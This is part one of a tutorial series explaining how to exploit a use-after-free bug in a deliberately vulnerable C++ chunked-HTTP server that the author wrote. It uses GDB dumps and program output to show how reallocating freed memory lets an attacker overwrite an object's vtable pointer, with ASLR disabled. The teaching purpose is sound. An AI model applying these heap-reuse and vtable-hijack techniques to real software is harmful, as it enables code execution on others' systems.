This is part one of a series of articles. Here is part two.
Introduction
I think my interest in computer security was initially sparked in the 1990s by movies like Sneakers and The Net and then by the book Practical Unix and Internet Security. Since then I have dabbled in it every once in a while, although it never was and still isn’t a major part of my day job. A couple of years ago I wanted to take a deeper dive and so I played around with reverse engineering, stack overflows and shell code a bit. But as operating systems and applications keep employing ever more sophisticated techniques to keep hackers out, today’s vulnerabilities and exploits are a lot more complex than simple stack overflows. So I developed the wish to really understand a modern exploit for a somewhat realistic vulnerability. This series of articles will describe what I came up with. If you’re now wondering what you are to expect, I’m talking about an exploit for a use-after-free bug that uses a heap spray and ROP to overwrite the vtable of an object and inject the malicious code… But don’t be afraid if you have no idea what these terms mean, I will explain them step by step. However, you should have some knowledge about C++ (or at least C), assembly and simple exploits like stack overflows. My hope is to bridge the gap between basic articles like the 1996 classic Smashing the Stack for Fun and Profit and very advanced stuff like what is being published by Google’s Project Zero.
The victim program and its vulnerability
For this series of articles I will use a vulnerability in a "victim" program that I specifically wrote for this purpose. This program (uaf-overwrite-vtable.cpp
) is a server written in C++ that receives data over HTTP and stores it for further processing. This data is transferred in blocks or chunks using the Chunked Transfer Encoding mechanism. It is base64-encoded, so it could be binary data, but neither the format nor the content are relevant to the vulnerability or the exploit. In fact, the actual data processing is not even implemented in the program.
So how does this program look like? The following listing shows how the chunks are read. As the program is started with socat, it can just communicate via standard input and output with the client.
std::vector<HTTPChunk*> chunks;
unsigned long chunk_num = 0, chunk_size;
while (true) {
std::getline(std::cin, line);
line.erase(line.find("\r"));
chunk_num++;
chunk_size = std::stoul(line, nullptr, 16);
std::fprintf(stderr, "Chunk #%ld has %ld bytes\n", chunk_num, chunk_size);
if (chunk_size == 0) {
std::fprintf(stderr, "Final chunk received, terminating\n");
std::cout << "HTTP/1.1 200 OK\r\n";
break;
}
else if (chunk_size <= MAX_CHUNK_SIZE) {
auto p_chunk = new HTTPChunk(std::cin, chunk_size); (1)
chunks.push_back(p_chunk); (2)
std::fprintf(stderr, "Chunk object at %p, decoded size = %ld\n", p_chunk, p_chunk->get_decoded_size());
}
else {
std::fprintf(stderr, "Chunk size %ld exceeds maximum size, aborting\n", chunk_size);
std::cout << "HTTP/1.1 400 Bad Request\r\n";
break;
}
}
As you can see, an object of the HTTPChunk
class is created for each chunk (1) and these objects are stored in a vector (2). The memory for these objects is allocated on the heap (via the new
operator).
Later in the program, we can find this piece of code:
for (auto p_chunk : chunks) {
chunk_num++;
try {
auto p_decoded_chunk = new unsigned char[p_chunk->get_decoded_size()];
decoded_chunks.push_back(p_decoded_chunk);
std::fprintf(stderr, "Buffer for decoded chunk #%ld at %p\n", chunk_num, p_decoded_chunk);
p_chunk->get_decoded_content(p_decoded_chunk, p_chunk->get_decoded_size());
}
catch (std::exception& e) {
std::fprintf(stderr, "Exception '%s' occurred while decoding chunk, deleting object\n", e.what());
delete p_chunk; (3)
}
}
You will probably notice that it contains a (rather obvious) bug. If an exception occurs while trying to decode a chunk (if the data in this chunk is not properly base64-encoded), the chunk object’s memory is freed (3) but the object is kept in the vector. So if the program later iterates again over all objects in the vector (in this case to free them before exiting), it will also access the objects already freed. This constitutes a so-called use-after-free bug.
Exploiting the vulnerability
So how can we exploit this bug, thus turning it into a vulnerability? First off, we can only use it for our purposes if we are able to overwrite the freed memory with data we can control, that we can somehow feed into the program. Then there are two possibilities, depending on what was stored in the memory that was freed. It it was data, that is the values of variables, we can change them and maybe thereby alter the program flow. A classical example would be a variable (or the attribute of an object) that stores the id of the authenticated user. If we replace the id of our user with the id of a user with extended privileges (e. g. root with the id 0 in Unix / Linux), we might be able to do things with the program that contains the bug we wouldn’t be allowed otherwise (a so-called priviledge escalation).
If the freed memory contained code or a code address, e. g. a function pointer, we can change the program’s behavior in way more far-reaching ways. If we’re able to change either the code directly or the code address so that it points to code we injected into the program, we can make the program do pretty much anything we want it to do. And exactly this case we have on our hands here, namely a function pointer, or to be more precise a pointer to a method.
You might wonder now where in our victim program a method pointer could be. To answer that question, we need to take a closer look at the HTTPChunk
class.
HTTPChunk
classclass HTTPChunk
{
unsigned char* mp_buffer; (1)
size_t m_buffer_size;
public:
HTTPChunk(std::istream& input_stream, size_t chunk_size);
virtual ~HTTPChunk(); (2)
size_t get_decoded_size() const;
virtual void get_decoded_content(unsigned char* p_buffer, size_t buffer_size); (3)
};
It mainly consists of a buffer for the chunk data (1), which gets allocated when the objects of this class are constructed, a destructor (2) that frees this buffer and a method get_decoded_content
(3) that decodes the base64-encoded chunk data and writes it into a caller-supplied buffer. Crucial to the vulnerability and the exploit is the fact that the class has virtual methods (get_decoded_content
and the destructor). This is because virtual methods cause the compiler to generate for the class a table of these methods, the so-called virtual method table or vtable. The methods are not invoked directly but indirectly using the pointers to the methods stored in this table. The reasons for this and the details are explained in the linked Wikipedia article. Even more information can be found in this and this article.
So if we’re able to change the vtable, we might be able to execute injected code. But before we can change the vtable (or even replace it completely), we need to know first where it’s located in the program. This shows us the following GDB session (the program was stopped at the line marked with (2) in listing 1).
pwndbg> set print asm-demangle on pwndbg> set print demangle on pwndbg> p sizeof(HTTPChunk) (1) $1 = 12 pwndbg> x/3dx p_chunk (2) 0x88d9c40: 0x0804feb8 0x088d9c50 0x00000001 pwndbg> i sym 0x0804feb8 vtable for HTTPChunk + 8 in section .data.rel.ro of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable pwndbg> x/3dx 0x0804feb8 (3) 0x804feb8 <vtable for HTTPChunk+8>: 0x0804acca 0x0804ad26 0x0804ad7a pwndbg> i sym 0x0804acca HTTPChunk::~HTTPChunk() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable (4) pwndbg> i sym 0x0804ad26 HTTPChunk::~HTTPChunk() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable (5) pwndbg> i sym 0x0804ad7a HTTPChunk::get_decoded_content(unsigned char*, unsigned int) in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable (6)
As you can see (1), the size of HTTPChunk
objects is 12 bytes or 3 double words (if the program was compiled for a 32-bit processor architecture, which is the case with our program). Two of them are of course the object attributes, the pointer to the buffer holding the chunk data and the chunk size, respectively. But what about the third double word? To find out, I dumped an object and checked if any of the double words can be found in the program’s symbol table (2). And lo and behold, the first one points to the vtable of the HTTPChunk
class (actually not to the start of the table but 8 bytes in, but this is not relevant here). Now we know that objects of a class with virtual methods start with a pointer to the vtable (at least if we use GCC, the memory layout of an object depends on the compiler). You can also see that the vtable is stored in a write-protected memory area, namely the .data.rel.ro
section of the program.
So how does the table itself look like? It again consists of three double words, the pointers to the virtual methods (3). You might now wonder why there are two destructors and you wouldn’t be alone. This answer on Stack Overflow explains why GCC creates two, namely the so-called complete object destructor (4) and the deleting destructor (5). The third pointer (6) points of course to the get_decoded_content
method.
This knowledge enables us now to outline a possible exploit for the vulnerability in the victim program.
-
We inject the code we want to execute into the program.
-
We construct a new vtable where one pointer doesn’t point to a method of the class but to the injected code instead. This vtable must also be injected into the program.
-
We overwrite the pointer to the vtable of an existing object with a pointer to the vtable constructed in step 2.
Is the method with the overwritten pointer later called on the modified object, our injected code will be executed… bingo :-) The remainder of this article and the other two articles in this series will show you how to perform the exploit in detail.
Step 1: Calling a pre-defined routine in the victim
In this first step we will make our lives a little easier. Instead of injecting the malicious code, that is the code we want to execute, we will incorporate it in the victim program as a routine. This is of course (in most cases) not a realistic scenario, but it makes it easier to develop the exploit step by step. So this means we "only" need to replace the pointer to the vtable and the vtable itself.
To change the pointer to the vtable of an existing object, we make use of several facts. First, all objects stored in the vector chunks
are processed in a loop one after another. Second, the memory of the objects, for which the decoding of the data fails, is freed but the pointer to the object is kept in the vector (see listing 2). Finally, there is a new buffer allocated for the decoded chunk data for each object that is processed in the loop. This means that after freeing one object’s memory (which contains the pointer to the vtable), new memory is allocated that we can fill with arbitrary data (because it’s the buffer for the next chunk’s decoded data). We just need to find a way to force the program to re-use the object’s memory for the next allocation, then we’re able to modify deleted objects arbitrarily. I don’t want to go into the details of how memory allocations work on Linux with the GNU C standard library (the operator new
uses the routine malloc
under the hood). But an easy way is to make the size of the next chunk’s decoded data match the size of the HTTPChunk
objects (depending on the block size used by malloc
and the size of the objects, it might also work if the next chunk is slightly smaller).
So what we need for the exploit is two specially constructed chunks that we feed into the program. The first chunk can be any size, but it needs to contains incorrectly encoded data. The size of the decoded second chunk must, as I just explained, equal the size of the HTTPChunk
objects (12 bytes) and it must contain a pointer to the new vtable (the other data doesn’t matter).
The new vtable itself will be injected into the program using a third chunk. This vtable consists of three entries, each a pointer to the routine pwned_destructor
in the program. This is the routine that contains the "malicious" code we want to execute (it just prints the string "You’ve been pwned!!!").
You might think we’d be done now and you would have been right 15 or 20 years ago. But nowadays systems usually use ASLR to prevent exactly this kind of attacks. This means that all memory addresses (code and data) are randomized and differ from one invocation of a program to the next. So there is no (easy) way for us to know where the pwned_destructor
routine and the buffer for the decoded third chunk (which contains our vtable) are located. I will show you a way to (partially) bypass ASLR in the second article of this series, but for now we will just disable it when we run the victim program (with the setarch
command).
The following listing shows the (shortened) output of the program when the exploit is run against it (using the script exploit-uaf.py
).
$ setarch $(uname -m) -R socat tcp-l:9999,reuseaddr exec:./uaf-overwrite-vtable Waiting for requests... Reading chunks... Chunk #1 has 1 bytes Chunk object at 0x8056c40, decoded size = 0 Chunk #2 has 16 bytes Chunk object at 0x8056c70, decoded size = 12 (1) Chunk #3 has 16 bytes Chunk object at 0x8056c60, decoded size = 12 Chunk #4 has 0 bytes Final chunk received, terminating Processing chunks... Buffer for decoded chunk #1 at 0x8056ca0 Exception 'Size of base64-encoded data is not a multiple of 4' occurred while decoding chunk, deleting object (2) HTTPChunk::~HTTPChunk() called (3) Buffer for decoded chunk #2 at 0x8056c40 (4) Buffer for decoded chunk #3 at 0xe8ea9010 You've been pwned!!! (5) HTTPChunk::~HTTPChunk() called HTTPChunk::~HTTPChunk() called
There are a few things to note here. First, we can see that the size of the decoded second chunk is the same as the size of the HTTPChunk
objects (1), which is, as stated before, a prerequisite for the exploit to work. In the line marked with (2) we see that an exception occurs when the victim tries to decode the first chunk and the chunk object gets deleted, which is confirmed by the next line (3) that tells us that the destructor is called. All the magic happens when the buffer for the second chunk is allocated (4) because it gets allocated at the address where the deleted first chunk object lived (0x8056c40), thus overwriting the object’s memory. The line marked with (5) shows us that the exploit actually works.
We can also take a look at the program with debugger right before the first chunk object is about to be deleted for the second time (before the program exits, at line 174).
pwndbg> x/3dx p_chunk 0x8056c40: 0xe8ea9010 0x78787878 0x78787878 (1) pwndbg> x/3dx 0xe8ea9010 0xe8ea9010: 0x0804a3dd 0x0804a3dd 0x0804a3dd (2) pwndbg> i sym 0x0804a3dd (3) pwned_destructor() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable
This confirms that the object’s memory has been overwritten with a pointer to our fake vtable (1), which is a pointer to the buffer for the decoded third chunk (0xe8ea9010), and that the vtable consists of pointers to pwned_destructor
((2) and (3)).
With that we have reached the end of part one of this series. In part two we will make the exploit more realistic by defeating ASLR and actually injecting the malicious code. Stay tuned if you liked it so far…